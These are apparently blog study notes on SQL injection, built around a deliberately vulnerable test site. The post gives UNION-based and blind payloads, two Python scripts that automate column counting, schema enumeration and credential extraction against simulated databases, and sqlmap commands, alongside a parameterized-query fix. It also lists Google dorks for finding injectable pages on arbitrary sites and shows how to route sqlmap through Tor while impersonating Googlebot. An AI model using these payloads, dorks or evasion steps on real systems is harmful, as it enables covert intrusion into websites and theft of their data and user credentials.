Simple notes on learning SQL injection

Author: 一点也不想吃辣 | Published 2017-05-19 16:32, read 17 times

Reference articles

Reference for study: http://bbs.pediy.com/thread-218235.htm

Google search (dorks that find pages passing an ID through the query string, i.e. candidate injection points):
inurl:"products.php?prodID="

inurl:buy.php?category=

Baseline request, then a single quote to provoke a database error:

http://testphp.vulnweb.com/listproducts.php?cat=1

http://testphp.vulnweb.com/listproducts.php?cat='

Find the column count with ORDER BY: keep raising the index until the page errors; the last index that still works is the number of columns (11 on this page):

http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6

UNION SELECT with the same number of columns (11). With cat=1 the real rows are still shown; cat=-1 matches nothing, so only the injected row appears and the numbers that show up on the page mark the reflected columns:

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

Replace a reflected column with @@version to read the MySQL version:

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Sometimes the server will not return @@version as-is (typically MySQL's "Illegal mix of collations" error, because the UNION column has a different character set) and the value has to be converted: replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).

Table names from information_schema.tables (every schema, one table per row):

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

All tables of the current database on one line with group_concat(), filtered on table_schema=database():

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()

Column names of one table. The table name is given as a hex literal (0x4556454e5453 is 'EVENTS') so the payload contains no quotes, which matters when quotes are filtered or escaped:

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

The server's character sets from information_schema.CHARACTER_SETS, first the names alone, then several columns joined with 0x3a (':') as separator:

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS
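The ORDER BY / UNION SELECT sequence above, automated against a simulated target. This is an added example, not code from the original post or from testphp.vulnweb.com: it builds an in-memory SQLite database with constructed data in place of the site's MySQL backend (sqlite_master stands in for information_schema.tables and .columns, sqlite_version() for @@version), and a deliberately vulnerable handler list_products() that concatenates the cat parameter just as listproducts.php?cat= does. It generalizes the post slightly: lookups are wrapped as scalar subqueries, so they can be placed in any reflected column rather than only the last one.

```python
import sqlite3

# --- Simulated target (constructed; stands in for listproducts.php?cat= and its MySQL backend) ---

def build_db():
    """In-memory SQLite database with made-up rows, playing the role of the site's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, cat INTEGER, name TEXT, price REAL);
        CREATE TABLE users(uname TEXT, pass TEXT, email TEXT);
        INSERT INTO products VALUES (1, 1, 'lamp', 9.5), (2, 1, 'chair', 40.0), (3, 2, 'desk', 99.0);
        INSERT INTO users VALUES ('test', 'test', 'test@example.com');
    """)
    return db


def list_products(db, cat):
    """Deliberately vulnerable page handler: `cat` is concatenated straight into the SQL.

    The query selects four columns but the page renders only name and price
    (columns 3 and 4), which is why not every UNION column is reflected.
    """
    sql = "SELECT id, cat, name, price FROM products WHERE cat=" + cat
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return {"ok": False, "error": str(exc), "shown": []}   # verbose error, like the live site
    return {"ok": True, "error": None, "shown": [(r[2], r[3]) for r in rows]}


# --- Attacker side: the manual ORDER BY / UNION SELECT steps, automated ---

def count_columns(page, max_cols=30):
    """ORDER BY n is accepted while n <= column count; the first failing n reveals the count."""
    for n in range(1, max_cols + 1):
        if not page("1 ORDER BY %d" % n)["ok"]:
            return n - 1
    raise RuntimeError("column count exceeds %d" % max_cols)


def reflected_columns(page, ncols):
    """Inject a distinct marker into every UNION column and see which ones the page prints."""
    markers = ["'<%d>'" % i for i in range(1, ncols + 1)]
    res = page("-1 UNION SELECT " + ",".join(markers))   # cat=-1 empties the real result set
    printed = " ".join(str(v) for row in res["shown"] for v in row)
    return [i for i in range(1, ncols + 1) if "<%d>" % i in printed]


def extract(page, ncols, col, expr):
    """Put a scalar expression into reflected column `col`, NULL elsewhere, and read it back.

    Wrapping lookups as scalar subqueries lets the expression sit in any column;
    the original post instead always uses the last column and appends FROM ...
    after the column list, which only parses in that position.
    """
    cells = ["NULL"] * ncols
    cells[col - 1] = expr
    res = page("-1 UNION SELECT " + ",".join(cells))
    return next(v for v in res["shown"][0] if v is not None)


def enumerate_target(db):
    """Run the whole chain: column count, reflected columns, version, tables, columns, data."""
    page = lambda cat: list_products(db, cat)
    ncols = count_columns(page)
    refl = reflected_columns(page, ncols)
    col = refl[0]
    return {
        "columns": ncols,
        "reflected": refl,
        "version": extract(page, ncols, col, "sqlite_version()"),           # @@version
        "tables": extract(page, ncols, col,                                 # information_schema.tables
                          "(SELECT group_concat(name) FROM sqlite_master WHERE type='table')"),
        "users_ddl": extract(page, ncols, col,                              # information_schema.columns
                             "(SELECT sql FROM sqlite_master WHERE name='users')"),
        "creds": extract(page, ncols, col, "(SELECT group_concat(uname||':'||pass) FROM users)"),
    }


if __name__ == "__main__":
    for key, value in enumerate_target(build_db()).items():
        print(key, "=>", value)
```

Against the simulated page the chain finds 4 columns, of which 3 and 4 are reflected, and pulls the version, the table list, the CREATE statement of users and the credentials through column 3. The only thing that changes on a real MySQL target is the expressions: @@version, information_schema.tables and information_schema.columns in place of the SQLite equivalents.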

The same steps with sqlmap. --time-sec 15 raises the delay sqlmap uses for time-based blind tests (useful on a slow target); --dbs lists the databases; -D and -T choose the database and table for --tables and --columns:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

Types of SQL injection attack
Classic SQLi
Blind or inferential SQLi
DBMS-specific SQLi
Compounded SQLi, i.e. SQL injection combined with another attack:
    SQL injection + insufficient authentication
    SQL injection + DDoS attacks
    SQL injection + DNS hijacking
    SQL injection + XSS

Incorrectly filtered escape characters

This form of SQL injection occurs when user input is not filtered for escape characters (above all the single quote) and is passed straight into an SQL statement, for example:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"

A comment can even cut off the rest of the query (there are three types of SQL comment). All three lines end with a space, because MySQL only treats -- as a comment when whitespace follows it:
' or '1'='1' --
' or '1'='1' ({
' or '1'='1' /*

Blind (inferential) injection: the page looks the same or different depending only on whether the injected condition holds, here whether the first character of @@version is 4; repeating this with other positions and values leaks the string one character at a time:
http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4
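The two techniques of this section, the comment-truncation bypass against the unfiltered statement above and the character-by-character blind inference of showReview.php?ID=5 AND substring(@@version,1,1)=4, run against a simulated application, with the parameterized query that stops both. This is an added example, not code from the original post or from any of the sites it mentions. Assumptions: an in-memory SQLite database with constructed rows stands in for the backend; substr() and sqlite_version() replace MySQL's substring() and @@version (SQLite only added substring() in 3.34); SQLite does not require the space after --, but the payloads keep it so they also work on MySQL.

```python
import sqlite3

def build_db():
    """Constructed in-memory SQLite database standing in for the application's backend."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(name TEXT, email TEXT);
        INSERT INTO users VALUES ('alice', 'alice@example.com'), ('bob', 'bob@example.com');
    """)
    return db


def find_user_vulnerable(db, user_name):
    """The statement from the text, built exactly as the text shows it: no escaping, no placeholders."""
    statement = "SELECT * FROM users WHERE name = '" + user_name + "';"
    return db.execute(statement).fetchall()


def find_user_safe(db, user_name):
    """Fixed version: a parameterized query. The driver sends the value separately from the
    SQL text, so quotes and comment sequences in it are just characters of a name."""
    return db.execute("SELECT * FROM users WHERE name = ?;", (user_name,)).fetchall()


def oracle(db, condition):
    """Boolean oracle: the page shows a row exactly when the injected condition is true.

    This is the showReview.php?ID=5 AND <condition> idea; the trailing '-- '
    comments out the closing quote and semicolon the application appends.
    """
    payload = "alice' AND (" + condition + ") -- "
    return len(find_user_vulnerable(db, payload)) > 0


def leak_version(db, max_len=12, charset="0123456789."):
    """Recover sqlite_version() one character at a time from true/false page differences.

    For each position, ask "is character i equal to c?" for every candidate c.
    A position where no candidate matches means the string has ended.
    On MySQL the probe would be substring(@@version, i, 1) = 'c' instead.
    """
    out = ""
    for i in range(1, max_len + 1):
        for c in charset:
            if oracle(db, "substr(sqlite_version(), %d, 1) = '%s'" % (i, c)):
                out += c
                break
        else:
            break
    return out


def real_version():
    """Ground truth the attacker does not have; used only to check the leak."""
    return sqlite3.sqlite_version


if __name__ == "__main__":
    db = build_db()
    bypass = "' or '1'='1' -- "
    print("vulnerable, normal input :", find_user_vulnerable(db, "alice"))
    print("vulnerable, bypass       :", find_user_vulnerable(db, bypass))   # every user
    print("parameterized, bypass    :", find_user_safe(db, bypass))         # nothing
    print("leaked version           :", leak_version(db), "(real:", real_version() + ")")
```

Two things to take from the run: the bypass payload returns every row from the concatenated statement and no row from the parameterized one, and the oracle needs only a visible true/false difference, never an error message or a reflected column, to pull the whole version string out, which is why blind injection is just as serious as the UNION-based kind.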

Routing sqlmap through Tor: install and start the tor daemon, then point sqlmap at its SOCKS5 port (sqlmap's --check-tor option confirms the traffic really leaves via Tor before any testing starts):
apt-get install tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5

Pretending to be Googlebot with a custom User-Agent:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Article title: Simple notes on learning SQL injection

Article link: https://www.haomeiwen.com/subject/zjyyxxtx.html